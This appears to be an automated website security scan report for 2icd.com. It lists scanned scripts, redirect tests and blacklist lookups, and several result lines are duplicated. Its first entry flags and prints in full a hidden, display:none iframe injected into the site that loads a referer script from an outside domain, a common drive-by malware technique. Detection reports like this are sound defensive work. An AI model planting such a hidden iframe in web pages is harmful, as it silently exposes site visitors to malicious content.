Scanned pages/files
Request | Server response | Status |
http://2icd.com/ | 200 OK Content-Length: 4268 Content-Type: text/html | suspicious |
Hidden iFrame found. style: hidden src: http://navisrom.com/referer.php?id={36b5f91a-607b-4034-8fc5-1009759e4e8a} <iframe style="visibility: hidden; display: none; display: none;" src="http://navisrom.com/referer.php?id={36b5f91a-607b-4034-8fc5-1009759e4e8a}"> | ||
http://www.giffoniacademy.it/counter.php?id=17612202 | 404 Articolo non trovato Content-Length: 1469 Content-Type: text/html | clean |
http://www.giffoniacademy.it/index.php | 200 OK Content-Length: 29564 Content-Type: text/html | clean |
http://www.giffoniacademy.it/media/system/js/mootools-core.js | 200 OK Content-Length: 96362 Content-Type: application/javascript | clean |
http://www.giffoniacademy.it/media/system/js/core.js | 200 OK Content-Length: 4784 Content-Type: application/javascript | clean |
http://www.giffoniacademy.it//ajax.googleapis.com/ajax/libs/jquery/1.8/jquery.min.js/ | 404 Categoria non trovata Content-Length: 1471 Content-Type: text/html | clean |
http://www.giffoniacademy.it/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://www.giffoniacademy.it/components/com_k2/js/k2.js?v2.6.8&sitepath=/ | 200 OK Content-Length: 8011 Content-Type: application/javascript | clean |
http://www.giffoniacademy.it/media/system/js/caption.js | 200 OK Content-Length: 729 Content-Type: application/javascript | clean |
http://www.giffoniacademy.it/plugins/system/jcemediabox/js/jcemediabox.js?version=116 | 200 OK Content-Length: 51877 Content-Type: application/javascript | clean |
http://www.giffoniacademy.it/media/system/js/mootools-more.js | 200 OK Content-Length: 238331 Content-Type: application/javascript | clean |
http://www.giffoniacademy.it/templates/stylecouncil/js/xtcMenu.js | 200 OK Content-Length: 5877 Content-Type: application/javascript | clean |
http://www.giffoniacademy.it/media/JoomlaXTC/showcaseFX.js | 200 OK Content-Length: 9202 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 2icd.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 17 Jun 2014 07:10:10 GMT
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/4.4.9-1.standard
GET / HTTP/1.1
Host: 2icd.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 17 Jun 2014 07:10:10 GMT
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/4.4.9-1.standard
Second query (visit from search engine):
GET / HTTP/1.1
Host: 2icd.com
Referer: http://www.google.com/search?q=2icd.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 2icd.com
Referer: http://www.google.com/search?q=2icd.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=2icd.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://2icd.com/
Result: 2icd.com is not infected or malware details are not published yet.
Result: 2icd.com is not infected or malware details are not published yet.